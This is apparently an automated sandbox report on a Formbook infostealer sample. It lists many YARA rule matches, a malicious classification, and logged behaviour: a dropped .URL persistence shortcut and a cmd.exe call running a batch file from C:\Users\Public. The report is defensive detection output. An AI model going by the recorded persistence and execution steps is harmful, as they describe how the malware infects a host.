        Source: 00000011.00000003.775665097.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794887190.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681184778.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774536260.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.791822656.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774973034.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680869212.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681329626.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794518867.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.795084927.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000003.680618860.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681146145.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774813034.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775978278.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680798955.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792171644.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000003.776284853.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776822633.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775198521.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794111065.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792024075.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793496729.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794375014.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681439102.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793721706.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681062128.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793652322.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680427643.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680522649.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681564607.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792344973.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776766122.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792856444.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.795208960.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681236193.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793342205.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.793928803.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.681840426.0000000003CA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792257287.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792959972.0000000003CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775748652.0000000003BD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792094708.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.792418310.0000000003DA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.792530901.0000000003CD4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680764371.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.775417344.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776363744.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000014.00000003.794288612.0000000003DA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000000.00000003.680899857.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000003.776524583.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776620878.0000000003BD4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.776945526.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774394805.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774870896.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000003.795419491.0000000003DA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 00000011.00000003.774740375.0000000003CA4000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\Public\novtiC.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@29/18@9/2
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5684:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6232:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_effl5svh.hnm.ps1
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '
